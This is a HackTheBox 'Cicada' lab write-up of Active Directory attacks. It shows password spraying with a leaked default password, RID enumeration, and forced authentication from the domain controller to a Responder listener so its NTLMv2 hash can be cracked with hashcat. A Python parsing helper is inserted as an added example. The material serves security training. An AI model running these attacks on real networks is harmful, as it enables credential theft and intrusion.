[HackTheBox] Cicada

Just another User-Description Leakage / SeBackupPrivilege Write-up.
Footprinting
Open ports
The Nmap scan shows it's a Windows machine (SMB:445, RPC:135/593, WinRM:5985), and more particularly a DC (LDAP:389/636, DNS:53, NTP:123, and especially Kerberos:88):
jamarir@kali:~$ sudo nmap -sS -p- -v -Pn --disable-arp-ping -oA syn_full --open 10.10.11.35;
jamarir@kali:~$ nmap -Pn --disable-arp-ping -sC -sV -v -oA nse 10.10.11.35 -p$(grep -oP '^\d*(?=/)(?=.* open )' syn_full.nmap |tr '\n' ',' |grep -oP '.*(?=,)')
[...]
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: <DATE>)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
57534/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-10-22T18:57:25
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
jamarir@kali:~$ sudo nmap -v -Pn --disable-arp-ping -sU --top-ports 100 -oA udp_top100 --open 10.10.11.35
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
Let's add this DNS server to our local resolver settings:
jamarir@kali:~$ sudo sed -i '1i nameserver 10.10.11.35' /etc/resolv.conf
And get its FQDN (CICADA-DC.cicada.htb):
jamarir@kali:~$ nxc smb 10.10.11.35
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
Local Privilege Escalation
User
Rabbit holations
LDAP’s null session ?
The Guest account, reached with the credentials a: (username a, empty password), is allowed to access SMB:
jamarir@kali:~$ for proto in ssh smb rdp vnc winrm ldap mssql wmi ftp; do (nxc $proto 10.10.11.35 -u 'a' -p '' &); done
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
LDAP 10.10.11.35 389 CICADA-DC [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090C78, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\a:
Note that even if the a: credentials are accepted by LDAP, we can't use them to perform arbitrary LDAP queries, at least for most of them: an empty-password simple bind is treated as an anonymous bind, on which AD refuses searches by default (hence the "a successful bind must be completed" error). The only nxc LDAP module giving an output is ldap-checker:
jamarir@kali:~$ nxc ldap 10.10.11.35 -u 'a' -p '' -M ldap-checker
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090C78, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\a:
LDAP-CHE... 10.10.11.35 389 CICADA-DC LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.11.35 389 CICADA-DC LDAPS Channel Binding is set to "NEVER"
This Guest account on SMB has access to an uncommon HR share:
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'a' -p '' -d cicada.htb --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share
Which contains a Notice from Human Resources:
jamarir@kali:~$ smbclient.py 'cicada.htb/a:@10.10.11.35'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# use HR
# ls
drw-rw-rw- 0 Fri Mar 15 07:26:17 2024 .
drw-rw-rw- 0 Thu Mar 14 13:21:29 2024 ..
-rw-rw-rw- 1266 Wed Aug 28 19:31:48 2024 Notice from HR.txt
Am I finally f/hired ?!
We may use smbget to download that file locally:
jamarir@kali:~$ smbget 'smb://10.10.11.35/HR/Notice From HR.txt' -U 'a%' --workgroup=cicada.htb
Using domain: CICADA.HTB, user: a
smb://10.10.11.35/HR/Notice From HR.txt
Downloaded 1.24kB in 0 seconds
jamarir@kali:~$ cat Notice\ From\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
Basically:
- The firm is named Cicada Corp.
- The support team's mail is support@cicada.htb.
- The password for new employees is set to Cicada$M6Corpb*@Lp#nZp!8 by default.
So, let's try the support username?
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'support' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d cicada.htb --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\support:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.10.11.35 445 CICADA-DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
Well, nxc reverted to the Guest account, which means that this support user doesn't exist in the domain.
“[W]e can see that Netexec authenticates twice when running the [nxc smb --shares] command. The second authentication is the authentication of the someaccountthatdoesntexist account which doesn’t exist within the Active Directory domain. Even if the user doesn’t exist we authenticate and connect to the svcctl named pipe which is used by Netexec to determine whether or not the account is local admin. But the account doesn’t exist so what is the magic trick? [...] When we connected as a user that doesn’t exist, the server was aware of it so it implicitly falls back to the guest account of the domain.”
Then, we could use enum4linux to enumerate users in the domain. Using the Guest username is important with enum4linux, as it doesn't automatically switch from a to Guest:
jamarir@kali:~$ enum4linux -a -u 'Guest' -p '' 10.10.11.35 -w cicada.htb |tee enum4linux.txt
[...]
=================================( Getting domain SID for 10.10.11.35 )=================================
Domain Name: CICADA
Domain Sid: S-1-5-21-917908876-1423158569-3159038727
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.11.35 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.11.35 from srvinfo:
10.10.11.35 Wk Sv PDC Tim NT CICADA-DC
platform_id : 500
os version : 10.0
server type : 0x80102b
[...]
====================( Users on 10.10.11.35 via RID cycling (RIDS: 500-550,1000-1050) )===================
[I] Found new SID:
S-1-5-21-917908876-1423158569-3159038727
[...]
[I] Found new SID:
S-1-5-32
[...]
[+] Enumerating users using SID S-1-5-32 and logon username 'Guest', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[...]
[+] Enumerating users using SID S-1-5-21-917908876-1423158569-3159038727 and logon username 'Guest', password ''
S-1-5-21-917908876-1423158569-3159038727-500 CICADA\Administrator (Local User)
S-1-5-21-917908876-1423158569-3159038727-501 CICADA\Guest (Local User)
S-1-5-21-917908876-1423158569-3159038727-502 CICADA\krbtgt (Local User)
[...]
S-1-5-21-917908876-1423158569-3159038727-1000 CICADA\CICADA-DC$ (Local User)
[+] Enumerating users using SID S-1-5-21-47050115-2771739599-2321771406 and logon username 'Guest', password ''
S-1-5-21-47050115-2771739599-2321771406-500 CICADA-DC\Administrator (Local User)
S-1-5-21-47050115-2771739599-2321771406-501 CICADA-DC\Guest (Local User)
S-1-5-21-47050115-2771739599-2321771406-503 CICADA-DC\DefaultAccount (Local User)
S-1-5-21-47050115-2771739599-2321771406-504 CICADA-DC\WDAGUtilityAccount (Local User)
S-1-5-21-47050115-2771739599-2321771406-513 CICADA-DC\None (Domain Group)
[...]
We could also have used nxc's --rid-brute feature, which enumerates users and groups in the target (domain-wise):
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'a' -p '' --rid-brute |tee -a rid_brute.txt
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
[...]
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
[...]
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
The following Perl regex will give us the users from the rid_brute output:
jamarir@kali:~$ grep -oP '^.*?1\d{3}.*\\\K.*(?= \(SidTypeUser)' rid_brute.txt |tee users.txt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
Only RIDs equal to or above 1000 are kept, as these correspond to non-built-in users and groups.
Sprayed mike
You guessed it, time to password spray !
jamarir@kali:~$ while read user; do for protocol in smb ldap winrm; do (nxc $protocol 10.10.11.35 -u "$user" -p 'Cicada$M6Corpb*@Lp#nZp!8' |grep -vP '( \[\*\] | STATUS_LOGON_FAILURE |RPC_S_ACCESS_DENIED| Connection refused | ERROR )'&); done; done < users.txt
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
We compromised cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8! We are authenticated on LDAP and SMB.
Nothing is interesting in the SMB shares:
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d cicada.htb --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
For LDAP, let's retrieve the BloodHound collection:
jamarir@kali:~$ nxc ldap 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d 'cicada.htb' --dns-server 10.10.11.35 --bloodhound --collection All
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP 10.10.11.35 389 CICADA-DC Resolved collection methods: session, objectprops, rdp, acl, psremote, container, dcom, localadmin, group, trusts
LDAP 10.10.11.35 389 CICADA-DC Done in 00M 03S
LDAP 10.10.11.35 389 CICADA-DC Compressing output into /home/jamarir/.nxc/logs/CICADA-DC_10.10.11.35_<DATE>_bloodhound.zip
Rabbit holations v2
WinRM ?
WinRM is listening on the target, so we might look for the Remote Management Users group's members, who are allowed to get a remote shell through WinRM on our target:
jamarir@kali:~$ nxc ldap 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d 'cicada.htb' --query "(&(memberOf=CN=Remote Management Users,CN=Builtin,DC=cicada,DC=htb))" "sAMAccountName"
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP 10.10.11.35 389 CICADA-DC [+] Response for object: CN=Emily Oscars,CN=Users,DC=cicada,DC=htb
LDAP 10.10.11.35 389 CICADA-DC distinguishedName: CN=Emily Oscars,CN=Users,DC=cicada,DC=htb
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: emily.oscars
Only Emily Oscars can use that service, but we haven't compromised her account yet :/
Let's check the BloodHound data.
I've forgotten my BloodHound/neo4j password… But luckily, we may disable that authentication, and optionally expose the neo4j service locally, by editing neo4j.conf:
jamarir@kali:~$ sudo neo4j stop
jamarir@kali:~$ sudo vim /etc/neo4j/neo4j.conf
dbms.security.auth_enabled=false
server.default_listen_address=127.0.0.1
jamarir@kali:~$ sudo neo4j start
Nothing really interesting shows up for our Michael user when looking at the groups he's a member of.
Weak passwords ?
Then we might try to:
- Enumerate, with our LDAP account, all the users and try a password spray again if we have new users. However, the users found in the LDAP query are the same as found above with the Guest account:
jamarir@kali:~$ nxc ldap 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d 'cicada.htb' --query "(&(objectCategory=person)(objectClass=user))" "*" |tee all_users.txt
jamarir@kali:~$ grep 'sAMAccountName' all_users.txt
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: Administrator
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: Guest
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: krbtgt
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: john.smoulder
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: sarah.dantelia
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: michael.wrightson
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: david.orelious
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: emily.oscars
- Try each username as its own password for the found users, but that's unsuccessful, even with local authentication (--local-auth):
jamarir@kali:~$ while read user; do for protocol in wmi winrm ldap smb; do (nxc $protocol 10.10.11.35 -u $user -p $user --no-bruteforce --continue-on-success |grep -vP '( \[\*\] | STATUS_LOGON_FAILURE |RPC_S_ACCESS_DENIED| Connection refused | ERROR )'&); done; done < users.txt
jamarir@kali:~$ while read user; do for protocol in wmi winrm ldap smb; do (nxc $protocol 10.10.11.35 -u $user -p $user --no-bruteforce --continue-on-success --local-auth |grep -vP '( \[\*\] | STATUS_LOGON_FAILURE |RPC_S_ACCESS_DENIED| Connection refused | ERROR )'&); done; done < users.txt
- Try a blank password for the found users, but that's unsuccessful:
jamarir@kali:~$ while read user; do (nxc smb ldap winrm wmi 10.10.11.35 -u $user -p '' --no-bruteforce --continue-on-success |grep -vP '( \[\*\] | STATUS_LOGON_FAILURE |RPC_S_ACCESS_DENIED| Connection refused | ERROR )'&); done < users.txt
Kerberoasting / ASREPRoasting ?
- Look for kerberoastable accounts (i.e. domain users with an SPN, whose TGS we can request and then crack offline, since the ticket is encrypted with the account's NT hash), but no entries are found...:
jamarir@kali:~$ GetUserSPNs.py -request -dc-ip 10.10.11.35 cicada.htb/'michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
No entries found!
- Look for ASREPRoastable accounts (i.e. accounts with Kerberos pre-authentication disabled, for which a TGT can be requested without a password and the AS-REP cracked offline), but no entries are found...:
jamarir@kali:~$ nxc ldap 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --asreproast ASREProastables.txt --kdcHost 10.10.11.35
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP 10.10.11.35 389 CICADA-DC [*] Total of records returned 3
LDAP 10.10.11.35 389 CICADA-DC No entries found!
Coerce Net-NTLMv2 u said ?!
After spending some time on the nxc vulnerability-scan modules, the following output sounded interesting:
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M coerce_plus
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
COERCE_PLUS 10.10.11.35 445 CICADA-DC VULNERABLE, DFSCoerce
COERCE_PLUS 10.10.11.35 445 CICADA-DC VULNERABLE, PetitPotam
COERCE_PLUS 10.10.11.35 445 CICADA-DC VULNERABLE, PrinterBug
COERCE_PLUS 10.10.11.35 445 CICADA-DC VULNERABLE, MSEven
Thus, we may use Responder along with Coercer to coerce the DC into authenticating to our listening SMB server, and capture its Net-NTLMv2 hash:
>>>
$ python gits/Coercer/Coercer.py coerce -l 10.10.14.7 -t 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d cicada.htb -v
______
/ ____/___ ___ _____________ _____
/ / / __ \/ _ \/ ___/ ___/ _ \/ ___/
/ /___/ /_/ / __/ / / /__/ __/ / v2.4.3
\____/\____/\___/_/ \___/\___/_/ by @podalirius_
[info] Starting coerce mode
[info] Scanning target 10.10.11.35
[*] DCERPC portmapper discovered ports: 49664,49665,58368,49667,49669,57542,57547,57549,57562,57534
[+] Coercing '10.10.11.35' to authenticate to '10.10.14.7'
[+] DCERPC port '57534' is accessible!
[+] Successful bind to interface (12345678-1234-ABCD-EF00-0123456789AB, 1.0)!
[!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification(pszLocalMachine='\\10.10.14.7\x00')
Continue (C) | Skip this function (S) | Stop exploitation (X) ? c
[!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification(pszLocalMachine='\\10.10.14.7@@80/pER\x00')
Continue (C) | Skip this function (S) | Stop exploitation (X) ? c
[!] (RPC_S_ACCESS_DENIED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx(pszLocalMachine='\\10.10.14.7\x00')
<<<
$ sudo responder -I tun0
[...]
[SMB] NTLMv2-SSP Client : 10.10.11.35
[SMB] NTLMv2-SSP Username : CICADA\CICADA-DC$
[SMB] NTLMv2-SSP Hash : [...]
Alternatively, we could also use nxc with the LISTENER option (and Responder in the background):
jamarir@kali:~$ sudo responder -I tun0
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M coerce_plus -o LISTENER=10.10.14.7
The format of the Net-NTLMv2 hash (hashcat mode 5600) is:
username::domain:ServerChallenge:NTproofstring:ntlmv2response
Basically, we might try to perform an NTLM relay attack (MITM: forward the coerced authentication to another service to impersonate the victim's computer) with this capture, or crack it. However, SMB signing is enabled (preventing relaying to SMB), and the hash isn't easily crackable: it belongs to the machine account CICADA-DC$, whose password is a long random value.
jamarir@kali:~$ hashcat -m 5600 -a 0 ntlmv2.hash /usr/share/wordlists/rockyou.txt
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: CICADA-DC$::CICADA:1122334455667788:ed15c4fedae42b8...000000
Time.Started.....: <DATE> (28 secs)
Time.Estimated...: <DATE> (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 369.9 kH/s (0.92ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 89%
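As an added example (not code from the write-up), a small Python triage helper for Net-NTLMv2 lines in the hashcat format above: it splits and validates the five fields, flags a machine account (trailing $, random password, not worth cracking) and flags a server challenge equal to Responder's well-known default 1122334455667788, the value visible in the Hash.Target line above. The sample lines are constructed, not real captures.

```python
import re
from dataclasses import dataclass

HEX = re.compile(r"^[0-9a-fA-F]+$")
# Responder ships with this fixed 8-byte server challenge in its default config;
# seeing it in a capture points at a rogue listener rather than a real server.
RESPONDER_DEFAULT_CHALLENGE = "1122334455667788"


@dataclass
class NetNtlmV2:
    user: str
    domain: str
    server_challenge: str
    nt_proof: str
    blob: str

    @property
    def is_machine_account(self) -> bool:
        # Computer accounts end in '$' and carry a random 120-character password
        return self.user.endswith("$")


def parse_netntlmv2(line: str) -> NetNtlmV2:
    """Parse a hashcat -m 5600 line: user::domain:serverchallenge:ntproofstr:blob."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("expected user::domain:challenge:proof:blob")
    user, _, domain, chal, proof, blob = parts
    if len(chal) != 16 or not HEX.match(chal):
        raise ValueError("server challenge must be 8 bytes (16 hex chars)")
    if len(proof) != 32 or not HEX.match(proof):
        raise ValueError("NTProofStr must be 16 bytes (32 hex chars)")
    # The NTLMv2 blob starts with RespType=1, HiRespType=1 (0x0101) and is hex
    if len(blob) < 32 or len(blob) % 2 or not HEX.match(blob) or not blob.lower().startswith("0101"):
        raise ValueError("NTLMv2 blob must be hex and start with 0101")
    return NetNtlmV2(user, domain, chal, proof, blob)


def triage(line: str):
    """Return (parsed, findings): why cracking this capture is unpromising,
    and what the capture reveals about the listener that collected it."""
    h = parse_netntlmv2(line)
    findings = []
    if h.is_machine_account:
        findings.append("machine account: random password, offline cracking is hopeless")
    if h.server_challenge.lower() == RESPONDER_DEFAULT_CHALLENGE:
        findings.append("server challenge is Responder's default: captured by a rogue listener")
    return h, findings


# Constructed samples (not real captures): proof and blob are made-up hex
SAMPLE_DC = (
    "CICADA-DC$::CICADA:1122334455667788:ed15c4fedae42b8f00112233445566aa:"
    "0101000000000000c0d1b50e1b0fdb01a1b2c3d4e5f6a7b80000000002000c00"
    "4300490043004100440041000000000000000000"
)
SAMPLE_USER = (
    "michael.wrightson::CICADA:0badf00d0badf00d:00112233445566778899aabbccddeeff:"
    "0101000000000000c0d1b50e1b0fdb01deadbeefdeadbeef0000000000000000"
)

if __name__ == "__main__":
    for sample in (SAMPLE_DC, SAMPLE_USER):
        parsed, notes = triage(sample)
        print(parsed.user, parsed.domain, notes)
```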
david.orelious's description, it was that izi …
After a night of rabbit holing, I started navigating into nxc's available modules, specifically the LDAP ones:
jamarir@kali:~$ nxc ldap 10.10.11.35 -L
LOW PRIVILEGE MODULES
[*] adcs Find PKI Enrollment Services in Active Directory and Certificate Templates Names
[*] daclread Read and backup the Discretionary Access Control List of objects. Be careful, this module cannot read the DACLS recursively, see more explanation in the options.
[*] enum_trusts Extract all Trust Relationships, Trusting Direction, and Trust Transitivity
[*] find-computer Finds computers in the domain via the provided text
[*] get-desc-users Get description of the users. May contained password
[*] get-network Query all DNS records with the corresponding IP from the domain.
[*] get-unixUserPassword Get unixUserPassword attribute from all users in ldap
[*] get-userPassword Get userPassword attribute from all users in ldap
[*] group-mem Retrieves all the members within a Group
[*] groupmembership Query the groups to which a user belongs.
[*] laps Retrieves all LAPS passwords which the account has read permissions for.
[*] ldap-checker Checks whether LDAP signing and binding are required and / or enforced
[*] maq Retrieves the MachineAccountQuota domain-level attribute
[*] obsolete Extract all obsolete operating systems from LDAP
[*] pre2k Identify pre-created computer accounts, save the results to a file, and obtain TGTs for each
[*] pso Module to get the Fine Grained Password Policy/PSOs
[*] sccm Find a SCCM infrastructure in the Active Directory
[*] subnets Retrieves the different Sites and Subnets of an Active Directory
[*] user-desc Get user descriptions stored in Active Directory
[*] whoami Get details of provided user
Among these, the get-desc-users module was definitely interesting!
